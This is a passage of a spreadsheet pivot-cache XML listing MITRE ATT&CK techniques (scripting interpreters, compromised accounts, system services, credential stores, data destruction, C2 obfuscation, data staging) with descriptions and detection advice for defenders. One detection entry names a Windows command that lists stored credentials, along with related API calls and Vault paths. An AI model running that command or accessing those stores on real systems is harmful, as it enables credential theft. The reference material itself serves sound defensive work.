    <s v="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_x000a__x000a_Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)_x000a__x000a_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s v="Windows"/>
    <s v="Command: Command Execution, Module: Module Load, Process: Process Creation, Script: Script Execution"/>
    <b v="1"/>
    <s v="T1059"/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <b v="1"/>
  </r>
  <r>
    <s v="T1059.006"/>
    <x v="85"/>
    <s v="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_x000a__x000a_Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors."/>
    <s v="https://attack.mitre.org/techniques/T1059/006"/>
    <d v="2020-03-09T00:00:00"/>
    <d v="2020-06-23T00:00:00"/>
    <n v="1"/>
    <x v="13"/>
    <s v="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s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1059"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1059.004"/>
    <x v="86"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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 v="https://attack.mitre.org/techniques/T1059/004"/>
    <d v="2020-03-09T00:00:00"/>
    <d v="2020-06-15T00:00:00"/>
    <n v="1"/>
    <x v="13"/>
    <s v="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
    <s v="Linux, macOS"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1059"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1059.005"/>
    <x v="87"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads."/>
    <s v="https://attack.mitre.org/techniques/T1059/005"/>
    <d v="2020-03-09T00:00:00"/>
    <d v="2020-08-13T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="13"/>
    <s v="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_x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Module: Module Load, Process: Process Creation, Script: Script Execution"/>
    <b v="1"/>
    <s v="T1059"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1059.003"/>
    <x v="88"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1059/003"/>
    <d v="2020-03-09T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="13"/>
    <s v="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s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1059"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1092"/>
    <x v="89"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1092"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-07-14T00:00:00"/>
    <n v="1"/>
    <x v="6"/>
    <s v="Monitor file access on removable media. Detect processes that execute when removable media is mounted."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Drive: Drive Access, Drive: Drive Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1586"/>
    <x v="90"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos._x000a__x000a_Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566)."/>
    <s v="https://attack.mitre.org/techniques/T1586"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization._x000a__x000a_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0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1586.002"/>
    <x v="91"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries can use a compromised email account to hijack existing email threads with targets of interest."/>
    <s v="https://attack.mitre.org/techniques/T1586/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1"/>
    <s v="T1586"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1586.001"/>
    <x v="92"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1586/001"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization._x000a__x000a_Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))."/>
    <s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1586"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1554"/>
    <x v="93"/>
    <s v="Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1554"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-03-27T00:00:00"/>
    <n v="1"/>
    <x v="3"/>
    <s v="Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. _x000a__x000a_Consider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections."/>
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Creation, File: File Deletion, File: File Metadata, File: File Modification"/>
    <b v="0"/>
    <m/>
    <s v="CrowdStrike Falcon OverWatch"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1584"/>
    <x v="94"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1584"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="Much of this activity will take place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control."/>
    <s v="PRE"/>
    <m/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1584.005"/>
    <x v="95"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1584/005"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="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
    <s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1584"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1584.002"/>
    <x v="96"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1584/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1"/>
    <x v="97"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1584/001"/>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4"/>
    <x v="98"/>
    <s v="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_x000a__x000a_Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)."/>
    <s v="https://attack.mitre.org/techniques/T1584/004"/>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3"/>
    <x v="99"/>
    <s v="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_x000a__x000a_Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party."/>
    <s v="https://attack.mitre.org/techniques/T1584/003"/>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6"/>
    <x v="100"/>
    <s v="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s v="https://attack.mitre.org/techniques/T1584/006"/>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s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1584"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1609"/>
    <x v="101"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1609"/>
    <d v="2021-03-29T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1"/>
    <x v="13"/>
    <s v="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
    <s v="Containers"/>
    <s v="Command: Command Execution"/>
    <b v="0"/>
    <m/>
    <s v="Alfredo Oliveira, Trend Micro; Brad Geesaman, @bradgeesaman; Center for Threat-Informed Defense (CTID); David Fiser, @anu4is, Trend Micro; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team"/>
    <m/>
    <m/>
    <b v="1"/>
  </r>
  <r>
    <s v="T1613"/>
    <x v="102"/>
    <s v="Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1613"/>
    <d v="2021-03-31T00:00:00"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1"/>
    <x v="2"/>
    <s v="Establish centralized logging for the activity of container and Kubernetes cluster components. This can be done by deploying logging agents on Kubernetes nodes and retrieving logs from sidecar proxies for application pods to detect malicious activity at the cluster level._x000a__x000a_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
    <s v="Containers"/>
    <s v="Application Log: Application Log Content, Cluster: Cluster Metadata, Container: Container Enumeration, Container: Container Metadata, Pod: Pod Enumeration, Pod: Pod Metadata"/>
    <b v="0"/>
    <m/>
    <s v="Center for Threat-Informed Defense (CTID); Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1136"/>
    <x v="103"/>
    <s v="Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system._x000a__x000a_Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection."/>
    <s v="https://attack.mitre.org/techniques/T1136"/>
    <d v="2017-12-14T00:00:00"/>
    <d v="2021-03-16T00:00:00"/>
    <n v="2.2000000000000002"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins."/>
    <s v="Azure AD, Google Workspace, IaaS, Linux, Office 365, Windows, macOS"/>
    <s v="Command: Command Execution, Process: Process Creation, User Account: User Account Creation"/>
    <b v="0"/>
    <m/>
    <s v="Microsoft Threat Intelligence Center (MSTIC); Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1136.003"/>
    <x v="104"/>
    <s v="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_x000a__x000a_Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection."/>
    <s v="https://attack.mitre.org/techniques/T1136/003"/>
    <d v="2020-01-29T00:00:00"/>
    <d v="2021-03-16T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="3"/>
    <s v="Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins."/>
    <s v="Azure AD, Google Workspace, IaaS, Office 365"/>
    <s v="User Account: User Account Creation"/>
    <b v="1"/>
    <s v="T1136"/>
    <s v="Microsoft Threat Intelligence Center (MSTIC); Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1136.002"/>
    <x v="105"/>
    <s v="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_x000a__x000a_Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system."/>
    <s v="https://attack.mitre.org/techniques/T1136/002"/>
    <d v="2020-01-28T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="3"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: Process Creation, User Account: User Account Creation"/>
    <b v="1"/>
    <s v="T1136"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1136.001"/>
    <x v="106"/>
    <s v="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_x000a__x000a_Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system."/>
    <s v="https://attack.mitre.org/techniques/T1136/001"/>
    <d v="2020-01-28T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="3"/>
    <s v="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s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: Process Creation, User Account: User Account Creation"/>
    <b v="1"/>
    <s v="T1136"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1543"/>
    <x v="107"/>
    <s v="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_x000a__x000a_Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.  _x000a__x000a_Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection).  "/>
    <s v="https://attack.mitre.org/techniques/T1543"/>
    <d v="2020-01-10T00:00:00"/>
    <d v="2020-10-09T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Monitor for changes to files associated with system-level processes."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1543.001"/>
    <x v="108"/>
    <s v="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_x000a_ _x000a_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
    <s v="https://attack.mitre.org/techniques/T1543/001"/>
    <d v="2020-01-17T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications."/>
    <s v="macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Service: Service Creation, Service: Service Modification"/>
    <b v="1"/>
    <s v="T1543"/>
    <m/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1543.004"/>
    <x v="109"/>
    <s v="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_x000a__x000a_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_x000a__x000a_The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation. "/>
    <s v="https://attack.mitre.org/techniques/T1543/004"/>
    <d v="2020-01-17T00:00:00"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="10"/>
    <s v="Monitor for launch daemon creation or modification through plist files and utilities such as Objective-See's KnockKnock application. "/>
    <s v="macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification"/>
    <b v="1"/>
    <s v="T1543"/>
    <m/>
    <s v="Administrator"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1543.002"/>
    <x v="110"/>
    <s v="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_x000a__x000a_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_x000a__x000a_* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. _x000a_* ExecReload directive covers when a service restarts. _x000a_* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'._x000a__x000a_Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1543/002"/>
    <d v="2020-01-17T00:00:00"/>
    <d v="2020-10-09T00:00:00"/>
    <n v="1.2"/>
    <x v="10"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as &lt;code&gt;/usr/sbin/service&lt;/code&gt; may reveal malicious systemd service execution."/>
    <s v="Linux"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification"/>
    <b v="1"/>
    <s v="T1543"/>
    <s v="Tony Lambert, Red Canary"/>
    <s v="User, root"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1543.003"/>
    <x v="111"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1543/003"/>
    <d v="2020-01-17T00:00:00"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="10"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software._x000a__x000a_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s v="Windows"/>
    <s v="Command: Command Execution, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1543"/>
    <s v="Matthew Demaske, Adaptforward; Pedro Harrison; Travis Smith, Tripwire"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1555"/>
    <x v="112"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1555"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1555.003"/>
    <x v="113"/>
    <s v="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_x000a__x000a_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_x000a_ _x000a_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_x000a__x000a_Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1555/003"/>
    <d v="2020-02-12T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="11"/>
    <s v="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s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access"/>
    <b v="1"/>
    <s v="T1555"/>
    <s v="Barry Shteiman, Exabeam; RedHuntLabs, @redhuntlabs; Ryan Benson, Exabeam; Sylvain Gil, Exabeam"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1555.001"/>
    <x v="114"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1555/001"/>
    <d v="2020-02-12T00:00:00"/>
    <d v="2020-02-17T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it."/>
    <s v="macOS"/>
    <s v="Command: Command Execution, File: File Access, Process: OS API Execution"/>
    <b v="1"/>
    <s v="T1555"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1555.005"/>
    <x v="115"/>
    <s v="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_x000a__x000a_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_x000a_ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)"/>
    <s v="https://attack.mitre.org/techniques/T1555/005"/>
    <d v="2021-01-22T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. _x000a__x000a_Consider monitoring file reads surrounding known password manager applications."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access"/>
    <b v="1"/>
    <s v="T1555"/>
    <s v="Matt Burrough, @mattburrough, Microsoft"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1555.002"/>
    <x v="116"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1555/002"/>
    <d v="2020-02-12T00:00:00"/>
    <d v="2020-02-17T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords."/>
    <s v="Linux, macOS"/>
    <s v="Command: Command Execution, Process: Process Access"/>
    <b v="1"/>
    <s v="T1555"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1555.004"/>
    <x v="117"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)"/>
    <s v="https://attack.mitre.org/techniques/T1555/004"/>
    <d v="2020-11-23T00:00:00"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="Monitor process and command-line parameters of &lt;code&gt;vaultcmd.exe&lt;/code&gt; for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., &lt;code&gt;vaultcmd /listcreds:“Windows Credentials”&lt;/code&gt;).(Citation: Malwarebytes The Windows Vault)_x000a__x000a_Consider monitoring API calls such as &lt;code&gt;CredEnumerateA&lt;/code&gt; that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)_x000a__x000a_Consider monitoring file reads to Vault locations, &lt;code&gt;%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\&lt;/code&gt;, for suspicious activity.(Citation: Malwarebytes The Windows Vault)"/>
    <s v="Windows"/>
    <s v="Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1555"/>
    <s v="Bernaldo Penas Antelo; Mugdha Peter Bansode"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1485"/>
    <x v="118"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)"/>
    <s v="https://attack.mitre.org/techniques/T1485"/>
    <d v="2019-03-14T00:00:00"/>
    <d v="2021-03-25T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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
    <s v="IaaS, Linux, Windows, macOS"/>
    <s v="Cloud Storage: Cloud Storage Deletion, Command: Command Execution, File: File Deletion, File: File Modification, Image: Image Deletion, Instance: Instance Deletion, Process: Process Creation, Snapshot: Snapshot Deletion, Volume: Volume Deletion"/>
    <b v="0"/>
    <m/>
    <s v="Brent Murphy, Elastic; David French, Elastic; Prasad Somasamudram, McAfee; Sekhar Sarukkai, McAfee ; Syed Ummar Farooqh, McAfee; Varonis Threat Labs"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1132"/>
    <x v="119"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1132"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-14T00:00:00"/>
    <n v="1.100000000000000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Traffic Content"/>
    <b v="0"/>
    <m/>
    <s v="Itzik Kotler, SafeBreach"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1132.002"/>
    <x v="120"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1132/002"/>
    <d v="2020-03-14T00:00:00"/>
    <d v="2020-03-14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132"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1132.001"/>
    <x v="121"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1132/001"/>
    <d v="2020-03-14T00:00:00"/>
    <d v="2020-03-14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132"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1486"/>
    <x v="122"/>
    <s v="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_x000a__x000a_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_x000a__x000a_In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)"/>
    <s v="https://attack.mitre.org/techniques/T1486"/>
    <d v="2019-03-15T00:00:00"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="1"/>
    <s v="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_x000a__x000a_In some cases, monitoring for unusual kernel driver installation activity can aid in detection._x000a__x000a_In cloud environments, monitor for events that indicate storage objects have been anomalously replaced by copies."/>
    <s v="IaaS, Linux, Windows, macOS"/>
    <s v="Cloud Storage: Cloud Storage Metadata, Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Oleg Kolesnikov, Securonix"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1565"/>
    <x v="123"/>
    <s v="Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making._x000a__x000a_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
    <d v="2020-03-02T00:00:00"/>
    <d v="2021-04-24T00:00:00"/>
    <n v="1"/>
    <x v="1"/>
    <s v="Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data."/>
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1565.003"/>
    <x v="124"/>
    <s v="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_x000a__x000a_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003"/>
    <d v="2020-03-02T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1"/>
    <x v="1"/>
    <s v="Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values."/>
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Process: OS API Execution"/>
    <b v="1"/>
    <s v="T1565"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1565.001"/>
    <x v="125"/>
    <s v="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_x000a__x000a_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001"/>
    <d v="2020-03-02T00:00:00"/>
    <d v="2020-03-02T00:00:00"/>
    <n v="1"/>
    <x v="1"/>
    <s v="Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values."/>
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Creation, File: File Deletion, File: File Modification"/>
    <b v="1"/>
    <s v="T1565"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1565.002"/>
    <x v="126"/>
    <s v="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_x000a__x000a_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002"/>
    <d v="2020-03-02T00:00:00"/>
    <d v="2020-03-02T00:00:00"/>
    <n v="1"/>
    <x v="1"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution"/>
    <b v="1"/>
    <s v="T1565"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1001"/>
    <x v="127"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1001"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-15T00:00:00"/>
    <n v="1.100000000000000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Traffic Content"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1001.001"/>
    <x v="128"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1001/001"/>
    <d v="2020-03-15T00:00:00"/>
    <d v="2020-03-15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001"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1001.003"/>
    <x v="129"/>
    <s v="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_x000a__x000a_Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. "/>
    <s v="https://attack.mitre.org/techniques/T1001/003"/>
    <d v="2020-03-15T00:00:00"/>
    <d v="2020-03-15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001"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1001.002"/>
    <x v="130"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1001/002"/>
    <d v="2020-03-15T00:00:00"/>
    <d v="2020-03-15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001"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1074"/>
    <x v="131"/>
    <s v="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_x000a__x000a_In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)_x000a__x000a_Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection."/>
    <s v="https://attack.mitre.org/techniques/T1074"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1.3"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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s v="IaaS, Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, File: File Creation"/>
    <b v="0"/>
    <m/>
    <s v="Praetorian; Shane Tully, @securitygypsy"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1074.001"/>
    <x v="132"/>
    <s v="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s v="https://attack.mitre.org/techniques/T1074/001"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="1"/>
